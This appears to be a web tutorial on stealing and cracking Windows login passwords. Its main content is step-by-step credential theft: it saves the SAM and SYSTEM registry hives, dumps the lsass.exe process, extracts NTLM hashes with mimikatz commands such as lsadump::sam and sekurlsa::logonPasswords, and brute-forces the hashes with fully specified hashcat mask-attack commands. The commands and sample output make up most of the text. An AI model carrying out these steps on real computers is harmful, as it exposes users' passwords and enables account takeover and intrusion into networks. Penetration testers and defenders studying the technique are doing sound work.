How to hack a Windows password

In this article, we will find out where the user password is stored in Windows, how to extract data for cracking the Windows password, how to hack user password and what is Pass the hash attack.

Not everyone uses a password on Windows – it is especially rare for users to set a password on a home computer that only one person works on. But in a corporate network or when using Windows as a server, a password is required. Another interesting property of a Windows user password: if a user has an online Microsoft account, the password hash is still stored on the local computer, and the decrypted password can be used to log in for both the local computer and Microsoft online services.

Where does Windows store user login password?

Windows user passwords are stored in the hives of the Windows registry called SYSTEM and SAM in the files:

  • C:/Windows/System32/config/SAM
  • C:/Windows/System32/config/SYSTEM

Instead of a plain text password, Windows stores password hashes. These hashes can be brute-forced easily. But even without cracking, Windows password hashes can be used to collect data and carry out attacks.

How to get Windows password hashes

Dump Windows password hashes on a running computer

On a running system, it is problematic to access the C:/Windows/System32/config/SAM and C:/Windows/System32/config/SYSTEM files, although this is possible. To save copies of these files, you can use the reg utility:

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv

In some tutorials, instead of SYSTEM, the SECURITY hive is saved – this is a mistake, you cannot restore the hash with the SECURITY and SAM hives, we just need SYSTEM and SAM!

The password hash is also contained in RAM, namely in the Local Security Authority Process (lsass.exe). This process is always launched in running Windows and you can dump it (a copy of the process in RAM is saved to disk as a file). You can use various utilities to create a dump, including two official ones:

There is already a task manager on every Windows, to open it press Win+r and type taskmgr, then press ENTER. Or, right-click on the taskbar (that is, on the bottom bar where the clock, start button, etc.) are located and select “Task Manager” in the context menu.

In the Task Manager, click “Details” and in the “Processes” tab, in the “Windows Processes” section, find the Local Security Authority Process, right-click on it and select “Create Dump File” in the context menu:

Wait for completion:

The file will be saved along the C:\Users\USERNAME\AppData\Local\Temp\lsass.DMP path. I have the MiAl username and the path to the file C:\Users\MiAl\AppData\Local\Temp\lsass.DMP.

Dump Windows password hashes on a turned off computer

On the turned off computer, for subsequent retrieval of the user's password, it is enough to copy the files:

  • C:/Windows/System32/config/SAM
  • C:/Windows/System32/config/SYSTEM

The same files can be found in the Windows backup or in the Shadow copy of the disk, or you can copy it by booting from the Live system.

What is the difference between NTLM and NTLMv1/v2 hashes and Net-NTLMv1/v2

Now we will hunt for the NTLM hash. In the article “Windows Network Authentication Hacking”, we already hunted for the NTLMv1 and NTLMv2 hashes, whose name is pretty similar.

Actually, NTLM and NTLMv1/v2 are quite different things. The NTLM hash is stored and used locally, and the NTLMv1/NTLMv2 hashes are used for network authentication and are derived from the NTLM hash. Using any of these hashes, you can decrypt the Windows user password, but these are different encryption/cracking algorithms.

For the Pass-the-hash attack (we will cover it in this article), we use only the NTLM hash, and the NTLMv1/NTLMv2 hashes are not suitable.

There is one more question what is the Net-NTLMv1/v2 hashes. Net-NTLMv1/v2 hashes is an abbreviation for NTLMv1/v2 hashes, i.e. NTLMv1/v2 and Net-NTLMv1/v2 are the same. And NTLM is different.

In this article, we will extract, crack and exploit without brute-force the NTLM hash.

What is mimikatz

mimikatz program is well-known for the ability to extract passwords in plain text, hashes, PIN codes and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket attacks or build Golden tickets.

In this guide, we will only look at mimikatz's ability to extract NTLM hashes. Remember, mimikatz also has other very interesting features – look at its extensive help: https://github.com/gentilkiwi/mimikatz/wiki

There are implementations of mimikatz in Meterpreter & Metasploit, DLL reflection in PowerShell and other products. mimikatz can be run in Wine on Linux, but functions related to extracting data directly from Windows will not work; functions for extracting hashes from dumps or decryption from registry files should work on Linux.

How to install mimikatz on Windows

mimikatz is a portable command line utility. That is, installation is not required, but you need to be able to start if you are not very familiar with the command line.

1. Go to https://github.com/gentilkiwi/mimikatz/releases, download the mimikatz_trunk.7z or mimikatz_trunk.zip file. Unzip the downloaded archive.

2. Open PowerShell (Win+xWindows PowerShell (administrator)) or the command line (Win+rcmd).

3. At the command prompt, use the cd command to navigate to the folder with the mimikatz.exe executable file. For example, the archive is unpacked into the C:\Users\MiAl\Downloads folder, then the executable file will be in the C:\Users\MiAl\Downloads\mimikatz_trunk\x64\ folder:

cd C:\Users\MiAl\Downloads\mimikatz_trunk\x64\

4. Run the executable file.

.\mimikatz.exe

How to extract NTLM user password hash from registry files

The following commands must be executed in the mimikatz console.

The log command enables writing all output to a FILE:

log FILE

For example, to run all output in a hash.txt file:

log hash.txt

I copied the SYSTEM and SAM files from the turned off computer, now to extract the hash I need to run a command of the form:

lsadump::sam /system:C:\путь\до\SYSTEM /sam:C:\путь\до\SAM

An example of my command:

lsadump::sam /system:C:\Share-Server\files\SYSTEM /sam:C:\Share-Server\files\SAM

Output Example:

The output is quite extensive and there is a lot of data. Of interest are sequential lines of the form:

User : USERNAME
  Hash NTLM: HASH

In my example, interesting lines:

User : ShareOverlord
  Hash NTLM: 7ce21f17c0aee7fb9ceba532d0546ad6

User : Alexey
  Hash NTLM: ca76a176340f0291e1cc8ea7277fc571

There are also lines with usernames:

User : MiAl
User : Администратор

But after them there are no strings with the NTLM hash, because these users do not have a password in the system.

If you want to extract data from the registry files of the current operating system, then exit mimikatz, for this press Ctrl+c.

Now we will dump the SYSTEM and SAM registry hives of the current system:

reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv

Run mimikatz again:

.\mimikatz.exe

Turn on logging:

log hash-local.txt

And we execute a command indicating the files into which dumps of the registry hives are saved, that is, SystemBkup.hiv and SamBkup.hiv:

lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

Output Example:

Only one user with a hash was found here:

User : Администратор
  Hash NTLM: 5187b179ba87f3ad85fea3ed718e961f

In fact, to extract NTLM hashes from the local system, it was not necessary to dump the registry hives. Another option is to increase the privileges of the mimikatz program itself and extract hashes directly from the system. To do this, run the commands:

privilege::debug
token::elevate
log hash-local2.txt
lsadump::sam

How to extract NTLM hash from lsass.DMP file

Logically (and in practice) in the dump of the Local Security Authority Process should only be the hash of the user who logged in with a password.

First, specify the path to the dump file with a command of the form:

sekurlsa::minidump C:\path\to\lsass.DMP

For instance:

sekurlsa::minidump C:\Share-Server\files\lsass.DMP

Then run the command:

sekurlsa::logonPasswords

How to brute-force NTLM hash

For hacking I will take the following hash:

User : Alexey
  Hash NTLM: ca76a176340f0291e1cc8ea7277fc571

Take a look at the Hashcat help to find out the NTLM hash mode number:

   1000 | NTLM                                             | Operating Systems

That is, the NTLM hash number is 1000 (hashcat mode).

To launch a mask attack to crack NTLM in Hashcat, you need to run a command of the form:

hashcat -m 1000 -a 3 'HASH' MASK

An example of my real command:

hashcat --force --hwmon-temp-abort=100 -m 1000 -D 1,2 -a 3 -i --increment-min 1 --increment-max 10 -1 ?l?d ca76a176340f0291e1cc8ea7277fc571 ?1?1?1?1?1?1?1?1?1

In this command:

  • hashcat is the name of the executable file. On Windows, it could be hashcat64.exe.
  • --force means ignore warnings
  • --hwmon-temp-abort=100 means setting the maximum temperature, after which the brute-force attck will be interrupted, by 100 degrees Celsius
  • -m 1000 means NTLM hash type
  • -D 1,2 means to use both the central processor and the video card for brute-force
  • -a 3 means mask attack
  • -i means gradually increase the number of characters in the generated passwords
  • --increment-min 1 means start with mask length equal to one
  • --increment-max 10 means to end the search with a mask length of ten
  • -1 ?l?d means custom character set number 1, it includes small Latin letters (?l) and numbers (?d)
  • ca76a176340f0291e1cc8ea7277fc571 is the hash for hacking
  • ?1?1?1?1?1?1?1?1?1 is a mask from a custom character set

Let's hack one more hash:

User : Администратор
  Hash NTLM: 5187b179ba87f3ad85fea3ed718e961f

Command (another hash and another set of custom characters):

hashcat --force --hwmon-temp-abort=100 -m 1000 -D 1,2 -a 3 -i --increment-min 1 --increment-max 10 -1 ?l?u?d 5187b179ba87f3ad85fea3ed718e961f ?1?1?1?1?1?1?1?1?1

So, in this article, we learned how to extract an NTLM hash and crack a Windows password. But what if you fail to crack NTLM? See the second part, entitled “Pass-the-hash attack (how to use NTLM without cracking a password)” for the answer.

Last Updated on

Recommended for you:

Leave a Reply

Your email address will not be published.